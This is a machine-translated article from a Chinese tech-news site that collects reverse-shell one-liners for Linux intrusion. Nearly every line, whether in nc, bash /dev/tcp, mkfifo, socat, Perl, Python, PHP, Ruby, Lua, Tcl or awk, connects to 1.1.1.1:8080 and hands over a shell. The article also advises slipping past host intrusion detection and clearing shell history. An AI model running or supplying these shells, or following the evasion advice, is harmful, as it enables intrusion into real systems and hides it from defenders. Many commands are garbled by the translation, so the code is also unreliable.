Shulou(Shulou.com)05/31 Report--

In this issue, the editor will bring you about the skills of intranet rebound under Linux. The article is rich in content and analyzes and narrates it from a professional point of view. I hope you can get something after reading this article.

Usually, when doing penetration, you will be "lucky" to encounter remote command execution vulnerabilities in some applications, which are also increasing recently due to the endless emergence of java deserialization and binary class vulnerabilities.

Generally speaking, reliable companies will not expose the application server directly, but through proxy forwarding or mapping, when the server that can execute the command can access the public network (this depends on the specific situation, for example, when you need to load public network resources or other requirements), anti-connection skills will come in handy.

Summary of rebound skills

1. NC rebound

Nc 1.1.1.1 8080-e / bin/bash

2. Bash-socket rebound

/ bin/bash-I > / dev/tcp/1.1.1.1/8080 0room1

3. Shell-socket rebound

A) exec 2 > & 0 * 196 b) exec 5/dev/tcp/1.1.1.1/8080 cat & 5 > & 5; done [execute in two sentences]

4. File pipeline-nc/telnet bounce

A) rm / tmp/f;mkfifo / tmp/f; cat / tmp/f | / bin/sh-I 2 > & 1 | nc 1.1.1.1 8080 > / tmp/f b) rm / tmp/backpipe; mknod / tmp/backpipe pounding Bash 0/tmp/backpipe c) rm / tmp/backpipe; mknod / tmp/backpipe p & & telnet 1.1.1.1 8080 0/tmp/backpipe

5. Bash-telnet rebound

Telnet 1.1.1.1 8080 | / bin/bash | telnet 1.1.1.1 9090 [another port]

6. Socat rebound

Socat tcp-connect:1.1.1.1:8080 exec: "bash-li", pty,stderr,setsid,sigint,sane

7. Script bounce

A) Perl bounce 1) perl-e'use Socket;$i= "1.1.1.1"; $pendant 8080; socket (Scripp Precincet); if ("tcp"); if (connect (sockaddrynin ($pmae inetyogaton ($I) {open (STDIN, "> & S"); open (STDOUT, "> & S"); open (STDERR, "> & S"); exec ("/ bin/sh-I");};'2) perl-MIO-e'$p=fork Exit,if ($p); $c=new IO::Socket::INET (PeerAddr, "1.1.1.1 STDIN- 8080"); STDIN- > fdopen ($c _ r); $~-> fdopen ($c ~ w); system$_ while;' b) Python bounce python-c 'import socket,subprocess,os; s=socket.socket (socket.AF_INET,socket.SOCK_STREAM); s.connect ("1.1.1.1", 8080); os.dup2 (s.fileno (), 0) Os.dup2 (s.fileno (), 1); os.dup2 (s.fileno (), 2); p=subprocess.call (["/ bin/sh", "- I"]);'c) PHP rebound php-r'$sock=fsockopen ("1.1.1.1", 8080); exec ("/ bin/sh-I & 3 2 > & 3");'d) ruby rebound ruby-rsocket-e'f=TCPSocket.open ("1.1.1.1", 8080). To_i Exec sprintf ("/ bin/sh-I &% d 2 > &% d")'2) ruby-rsocket-e 'exit if fork; c=TCPSocket.new ("1.1.1.1", "8080"); while (cmd=c.gets); IO.popen (cmd, "r") {| io | c.print io.read} end' e) lua rebound lua-e "require (' socket'); require ('os'); t=socket.tcp () T:connect ('1.1.1.1); os.execute (' / bin/sh-I & 32 > & 3'); "f) tcl rebound echo's set [socket 1.1.1.1 8080]; while 42 {puts-nonewline $s" shell > "; flush $s; gets $s c; set e" exec $c "; if {! [catch {set r [eval $e]} err]} {puts $s $r}; flush $s;}; close $s '| tclsh g) awk bounce awk' BEGIN {s = "/ inet/tcp/0/1.1.1.1/8080"; while (42) {do {printf "shell >" | & s; s | & getline c; if (c) {while ((c | & getline) > 0) print $0 | & s; close (c);}} while (c! = "exit") close (s);}}'/ dev/null

8. Binary program bounce

Socket program + command execution, see metasploit for details.

The above are just the rebound techniques that individuals have used in infiltration.

Miscellaneous talk

Rebound shell on the market, there are many scripts and procedures, metasploit, for example, can produce hundreds of shell, but after decoding nothing more than the above, interesting time metasploit generated no matter the script rebound procedures or binary rebound procedures are mostly their own implementation of the system_call, rather than calling the system bash or commands and so on, it seems that doing is very conscientious.

It is worth mentioning that since large Party A companies will have HIDS protection, the known HIDS either modifies the bash, hijacks the glibc, or modifies the underlying layer of the system (this possibility is low, and the probability of problems is high).

When you think you can rebound shell, you must identify the environment in advance, otherwise you will execute a bash-I or nc, which is likely to be directly taken away by hids.

It is recommended to use shell built-in bounce or script type of bounce shell program, the general hids will not be recorded, it is not recommended to call the system bash command to produce a rebound, at least. Bash_history will properly sell you.

Intranet shell rebound is a topic that cannot be bypassed in both osmosis and reverse osmosis. There are several interesting questions about bounce shell:

1. Understanding of bouncing shell:

The essence of private network shell rebound is to establish a connection with the public network server, and execute the commands transmitted from the public network server, and return the result. Therefore, the rebound shell involves two processes: network establishment and command execution, both of which are the criteria for measuring the bounce function. Network establishment requires complex encryption (such as msf: meterpreter_reverse_https, etc.), and command execution requires bypassing hids and related records as far as possible.

two。 Interactive shell:

Interactive shell is one of the most common shell. Interactive shell distinguishes non-interactive shell*** by loading environment variables. The use of interactive shell is almost the same as in terminal terminal. In general, remote command execution bounces back just to implement a non-interactive shell. One of the easiest ways to upgrade from non-interactive shell to interactive shell is to use the python script pty.spawn ("/ bin/bash")

3. Interactive shell may not be better than non-interactive shell in the actual infiltration process, because experienced Party A will securely handle environment variables and shell terminal load files such as .bashrc, bash_profile, etc., and directly upgrade to interactive shell. The possibility of triggering HIDS alarm is higher (not absolute, of course).

(Ps: if you use other people's tools, bounce shell, but it is not clear whether it is interactive shell, a simple way is to execute history and set commands, if there are normal returns, then you should be careful, you may get an interactive shell, clear history as soon as possible. )

The above is the intranet rebound skills that Xiaobian shared with you under Linux. If you happen to have similar doubts, you might as well refer to the above analysis to understand. If you want to know more about it, you are welcome to follow the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.